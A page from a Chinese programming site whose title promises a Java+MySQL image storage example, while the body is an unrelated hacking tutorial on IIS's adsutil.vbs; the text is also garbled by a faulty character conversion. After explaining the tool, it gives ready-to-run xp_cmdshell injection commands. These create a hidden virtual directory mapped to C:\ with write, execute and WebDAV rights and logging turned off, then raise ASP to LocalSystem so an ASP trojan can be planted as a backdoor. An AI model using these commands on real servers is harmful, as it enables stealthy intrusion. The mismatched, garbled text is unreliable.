程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 編程語言 >> JAVA編程 >> 關於JAVA >> Java+MySql圖片數據保留與讀取的詳細實例

Java+MySql圖片數據保留與讀取的詳細實例

編輯:關於JAVA

Java+MySql圖片數據保留與讀取的詳細實例。本站提示廣大學習愛好者:(Java+MySql圖片數據保留與讀取的詳細實例)文章只能為提供參考,不一定能成為您想要的結果。以下是Java+MySql圖片數據保留與讀取的詳細實例正文


1、簡略引見 
adsutil.vbs是甚麼?信任用過IIS的網管員不會不曉得。這是IIS自帶的供給於敕令行下治理IIS的一個劇本。位於%SystemDrive%\Inetpub\AdminScripts目次下。足足有95,426 字節年夜小。這麼年夜的劇本一看就曉得功效壯大。現實也切實其實如斯。根本上我的感到它就是個敕令行下的“Internet 信息辦事治理器”。(現實上2000的辦事器上%SystemDrive%\Inetpub\AdminScripts下原有20多個vbs文件以供治理。而到了2003則只剩下adsutil.vbs一個了。足以解釋它的功效是何等龐雜) 
提到adsutil.vbs就不能不提到MetaBase.bin。這個文件是IIS最主要的設置裝備擺設文件。一切對IIS的設置終究都邑貯存在這個文件中。IIS治理器和adsutil.vbs就是經由過程對這個文件讀取設置裝備擺設信息來顯示給用戶的。MetaBase.bin的貯存構造非常像注冊表,是一種樹型貯存構造。IIS治理器和adsutil.vbs經由過程一個Adspath的途徑來拜訪MetaBase.bin。途徑是由IIS:\開首,個中LocalHost表現當地辦事器,而w3svc表現IIS辦事。如IIS:\LocalHost/w3svc/1表現當地辦事器上的第一個web站點。IIS:\LocalHost/w3svc/1/root/Vdir表現第一個web站點根目次下的Vdir虛擬目次。 
有了這些前置常識,上面再回到adsutil.vbs來看看它的用法吧: 

C:\Inetpub\AdminScripts>cscript adsutil.vbs    //別忘了鍵入cscript.exe這個劇本宿主文件名哦 
Microsoft (R) Windows Script Host Version 5.6 
版權一切(C) Microsoft Corporation 1996-2001。保存一切權力。 


Usage: 
      ADSUTIL.VBS <cmd> [<path> [<value>]] 

Description: 
IIS administration utility that enables the configuration of metabase properties 


Supported Commands:    //支撐的敕令。這個最主要 
  GET, SET, ENUM, DELETE, CREATE, COPY, 
  APPCREATEINPROC, APPCREATEOUTPROC, APPCREATEPOOLPROC, APPDELETE, APPUNLOAD, AP 
PGETSTATUS 

Samples:    //簡略的幾個例子 
  adsutil.vbs GET W3SVC/1/ServerBindings   //檢查第一個虛擬web站點的邦定端口。這裡的W3SVC/1是IIS:\ LocalHostW3SVC/1的簡寫,而ServerBindings是他的屬性。下同。 
  adsutil.vbs SET W3SVC/1/ServerBindings ":81:"  //設定第一個虛擬web站點的邦定端口為81。 
  adsutil.vbs CREATE W3SVC/1/Root/MyVdir "IIsWebVirtualDir"  //在第一個虛擬web站點根目次下樹立一個MyVdir的虛擬目次。前面的"IIsWebVirtualDir"指的是目次類型。 
  adsutil.vbs START_SERVER W3SVC/1  //啟動第一個虛擬web站點。 
  adsutil.vbs ENUM /P W3SVC   //檢查IIS的一切站點。 

For Extended Help type: 
  adsutil.vbs HELP  //假如想要進一步的檢查贊助,鍵入此敕令。我這裡就不轉了。避免有人說我賺稿費。年夜家可以本身看看。 

以上“//”後的文字都是我添加上去的正文(下同)。信任如許應當可以看懂了吧年夜家。 
我們所經常使用的adsutil.vbs的敕令有這麼幾個:GET, SET, ENUM, DELETE, CREATE。如今我來逐個解釋: 
GET敕令平日是用來檢查目次的各項屬性值的。SET是用來設定目次屬性用的。ENUM也是用來檢查屬性。所分歧的是他直接把一切設置了的屬性直接全體顯示出來。平日一個目次就有好幾頁器械可看……他有個可選的“/p”開關符。加上了此開關的話。他只會列出此目次下的一切虛擬目次。DELETE敕令是用來刪除虛擬目次的。CREATE則是創立一個虛擬目次。別的還有幾個敕令:START_SERVER、STOP_SERVER、PAUSE_SERVER、CONTINUE _SERVER。分離是啟動、停滯、暫停、持續虛擬站點的運轉。 
一個虛擬目次的年夜致屬性值以下(我只列出了能夠我們所經常使用的,不然會太長了): 

KeyType                         : (STRING) "IIsWebVirtualDir"  //目次類型,(STRING)解釋它是個字符串類型的屬性 
AppRoot                         : (STRING) "/LM/W3SVC/1/ROOT"  //目次IIS途徑 
AppFriendlyName                 : (STRING) "默許運用法式"  //運用法式名 
AppIsolated                     : (INTEGER) 2  //指定運轉於過程外照樣過程中,數字類型屬性。 
HttpCustomHeaders               : (LIST) (1 Items)   //自界說IIS數據頭 
  "Powered By : www.WoFeiWo.Info" 

HttpErrors                      : (LIST) (42 Items)  //各類IIS代碼所前往的頁面。可以自行設置。我這裡將會顯省略了。 
DefaultDoc                      : (STRING) "Default.htm,index.htm,Default.asp,in 
dex.asp,Default.php,index.php,Default.aspx,index.aspx"   //目次的默許主頁面稱號。 
Path                            : (STRING) "D:\ftp"  //目次所真正映照的物理途徑 
AccessFlags                     : (INTEGER) 513  //我也不曉得這是啥。橫豎沒設置過。似乎會主動設置的 
AccessExecute                   : (BOOLEAN) False   //目次的履行權限,是布爾值 
AccessSource                    : (BOOLEAN) False   //目次的Webdav拜訪能否許可 
AccessRead                      : (BOOLEAN) True   //目次的只讀權限 
AccessWrite                     : (BOOLEAN) False   //目次的寫權限 
AccessScript                    : (BOOLEAN) True    //目次能否許可履行劇本 
AccessNoRemoteExecute           : (BOOLEAN) False 
AccessNoRemoteRead              : (BOOLEAN) False 
AccessNoRemoteWrite             : (BOOLEAN) False 
AccessNoRemoteScript            : (BOOLEAN) False 
AccessNoPhysicalDir             : (BOOLEAN) False 
ScriptMaps                      : (LIST) (27 Items)   //運用法式擴大名映照 
  ".asa,C:\WINDOWS\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE" 
  ".asp,C:\WINDOWS\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE" 
  ".aspx,C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll,1,GET,HEA 
D,POST,DEBUG" 
  ………………  //這裡省略了n多半據 
AspEnableParentPaths            : (BOOLEAN) True 
AppPoolId                       : (STRING) "DefaultAppPool"  //運用法式池稱號 
DontLog                         : (BOOLEAN) True   //制止IISLog記載 
DirBrowseFlags                  : (INTEGER) -1073741762 
EnableDirBrowsing               : (BOOLEAN) True  //目次能否許可列目次 
DirBrowseShowDate               : (BOOLEAN) True  //這裡及以下都是顯示目次時的參數設置。英文都很簡略。我也就不多說了。 
DirBrowseShowTime               : (BOOLEAN) True 
DirBrowseShowSize               : (BOOLEAN) True 
DirBrowseShowExtension          : (BOOLEAN) True 
DirBrowseShowLongDate           : (BOOLEAN) True 
EnableDefaultDoc                : (BOOLEAN) True  //能否開啟默許主頁文檔 

以上是我用cscript adsutil.vbs ENUM w3svc/1/root敕令在本身機械上觀察到的。年夜家也能夠本身輸出以上敕令研討。 
下面的屬性我們都可以來經由過程SET敕令來停止設置。以下方法: 
cscript adsutil.vbs SET w3svc/1/root/目次名/屬性名 設置值 
如:cscript adsutil.vbs SET w3svc/1/root/wofeiwo/AccessRead 1  //設置第一個虛擬web站點下的wofeiwo虛擬目次的可讀權限為Ture 
或:cscript adsutil.vbs SET w3svc/1/root/wofeiwo/Path “C:\”  //設置目次的映照途徑是“C:\” 
上面來看看我們的簡略應用的例子 
2、adsutil.vbs的應用 
(一)MSSQL Injection的上傳新思緒 
也許年夜家會在MSSQL的注入中碰著這類情形:SA權限。可以履行Cmd敕令(xp_cmdshell、sp_OACreate、Job等等)。可是辦事器是在內網。裡面是個碉堡主機。只是做了個80端口的映照。3389開了沒有效(內網連不上啊),一切反向木馬也傳不上去(Tftp、Ftp、Wget、exe2bat等等)這時候候你該怎樣辦? 
Amanl年夜哥經典的《搾干MSSQL最初一滴血》給我們一個很好的思緒:就是應用%SystemDrive%\Inetpub\AdminScripts下的vbs樹立一個新的虛擬目次。自界說其映照的相對途徑。如許可以繞過了對web相對途徑的猜解。然後經由過程BACKUP或MASKWEBTASK備份數據庫或暫時表到虛擬目次下(或是直接echo)便可以獲得了一個shell。 
下面的設法主意切實其實很好。可是用過臭要飯的GetWebShell或小竹的NBUpFile的人都曉得BACKUP或MASKWEBTASK的勝利率有何等的低……而echo……我也不想說了。一行一行寫那的確是找罪受。(還要一直的轉特別字符……) 
其實我們可以把Amanl年夜哥的設法主意改良一下。在我們樹立一個新的虛擬目次的時刻。可以加上寫目次的權限。再加上Webdav……那末我們不久可以直接經由過程IIS上傳任何文件了嗎?也不只僅局限於文本文件了。假如我們上傳了個反向後門在經由過程SA履行……呵呵,一切就都弄定了! 
來,立時實施: 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs CREATE w3svc/1/Root/wofeiwo "IIsWebVirtualDir"';-- 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs cscript adsutil.vbs SET w3svc/1/root/wofeiwo/Path “C:\”';-- 
留意下面的特別字符要本身改變。或許你可以用NBSI2或許巷子的SQLCOMM來履行以上敕令。 
如許我們就在第一個web站點下樹立了一個wofeiwo的虛擬目次,映照到了C:根目次。我再給他加上讀和寫的權限,為了要一個webshell ,我再加上履行劇本的權限: 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/AccessRead 1';-- 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/AccessWrite 1';-- 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/AccessScript 1';-- 
寫到這看過Surperhei《對IIS寫權限的應用》的同伙能夠會想要本身結構http包來上傳文件。其實有更簡略的辦法: 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/EnableDirBrowsing 1';-- 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/AccessSource 1';-- 
設置為許可列目次和webdav拜訪,然後翻開你的IE,Ctrl+O翻開“翻開”對話框,鍵入你適才設置的虛擬目次。選中“以Web文件夾方法翻開”,肯定。如圖: 
圖一 


啊哈!看到一切的文件夾了嗎?如圖所示: 

圖二 


如今你便可以像操作通俗文件夾一樣操作以上文件了。還可以Ctrl+C、Ctrl+V復制文件呢。完成了便利上傳、修正文件的功效。 
(二)更進一步 
其實我們完整可以更進一步應用下面所說的思緒直接制造一個IIS後門。來,看我的完成!(這裡應用了動鲨在《近乎完善的IIS後門》中所引見的辦法。不外我是直接用adsutil.vbs這個MS自帶的對象完成了設置。對此文章感興致的同伙可以本身找來看看。) 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs CREATE w3svc/1/Root/wofeiwo "IIsWebVirtualDir"';--  //起首樹立一個wofeiwo目次。 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs CREATE w3svc/1/Root/wofeiwo/door "IIsWebVirtualDir"';--  //在wofeiwo目次下又樹立了一個door目次。 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs cscript adsutil.vbs SET w3svc/1/root/wofeiwo/door/Path “C:\”';--  //設置door目次映照到C:根目次。 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessRead 1';--  //這裡及以下都是給目次設置個種權限。可以參考以上的敕令正文。 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessWrite 1';-- 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessScript 1';-- 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/DontLog 1';-- 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/EnableDirBrowsing 1';-- 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessSource 1';-- 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessExecute 1';-- 
能夠會有人說,甚麼阿。不就是和下面的一樣嗎?呵呵。其實你細心看。會發明我們下面新建的第一個目次“wofeiwo”並沒有設置“Path”屬性。也就是說他沒有映照就任何現實的目次上去。這裡運用了IIS的一個破綻(觸及到IIS5.0.1.0)。即關於沒有“Path”屬性的虛擬目次是不會在IIS治理器中湧現的。相當於一個隱蔽的目次。而其下的虛擬目次“door”異樣是因為下級目次弗成見的,所以它也是弗成見的!然則“door”目次是設置了“Path”屬性的。所以假如我們提交http://IP/wofeiwo/door/ 途徑。其成果是會前往C:下的文件目次。如今此目次曾經是我們可以隨意率性寫文件讀文件了。而且還可以轉到System32目次下對法式停止運轉。我們的後門雛形建成了。(留意看我這裡是加上了AccessExecute履行權限的) 
然則我們如今履行的法式都照樣IIS默許的IUSR用戶的Guest權限。沒有年夜的權限我們老是不爽。上面來晉升我們的權限,加IUSR用戶為治理員就不說了。上面說說另兩個辦法: 
1、設置AppIsolated,使此目次下法式在IIS的過程中停止。如許就繼續了IIS的System權限。 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/ AppIsolated 0';-- 
2、    將解析asp文件的asp.dll參加到IIS的特權dll中。使得其在過程中運轉。從而的到IIS的LocalSystem權限。 
1)起首獲得IIS一切的特權dll 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs GET w3svc/InProcessIsapiApps';-- 
前往: 
InProcessIsapiApps              : (LIST)  (5 Items) 
  "C:\WINDOWS\system32\inetsrv\httpext.dll" 
  "C:\WINDOWS\system32\inetsrv\httpodbc.dll" 
  "C:\WINDOWS\system32\inetsrv\ssinc.dll" 
  "C:\WINDOWS\system32\msw3prt.dll" 
  "C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll" 
2)    將asp.dll設置到InProcessIsapiApps組中去,這裡要留意,把下面的一切查到的dll都加上,不然會被刪除。 
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/InProcessIsapiApps "C:\WINDOWS\system32\inetsrv\httpext.dll" "C:\WINDOWS\system32\inetsrv\httpodbc.dll" "C:\WINDOWS\system32\inetsrv\ssinc.dll" "C:\WINDOWS\system32\msw3prt.dll" "C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll" "C:\WINDOWS\system32\inetsrv\asp.dll"';-- 
前往: 
InProcessIsapiApps              : (LIST) "C:\WINDOWS\system32\inetsrv\httpext.dll" "C:\WINDOWS\system32\inetsrv\httpodbc.dll" "C:\WINDOWS\system32\inetsrv\ssinc.dll" "C:\WINDOWS\system32\msw3prt.dll" "C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll" "C:\WINDOWS\system32\inetsrv\asp.dll" 
如許就設置好了。今後不管甚麼asp文件就都是 LoaclSystem權限了。經由過程以上的步調。我們的IIS後門根本上就是設置好了。你可以上傳asp木馬加以幫助掌握。如許的設置型後門是很難被治理員發明的。而且完整經由過程IIS的80端口通信。又沒有日記記載。所以相當平安。 
3、結言 
到這裡我關於adsutil.vbs的一點簡略運用就停止了。忽然發明文章曾經寫了那末多了。哇啊啊……文章寫得好累阿。因為自己是一菜鳥。文章不免有疏漏。還請年夜家多多指教。有甚麼疑問請和我接洽。我的郵箱:[email protected]。或許年夜家可以到火狐技巧同盟http://www.wrsky.com來找我。我的ID:我非我。是服裝論壇t.vhao.net老手版的版主。
  1. 上一頁:
  2. 下一頁:
Copyright © 程式師世界 All Rights Reserved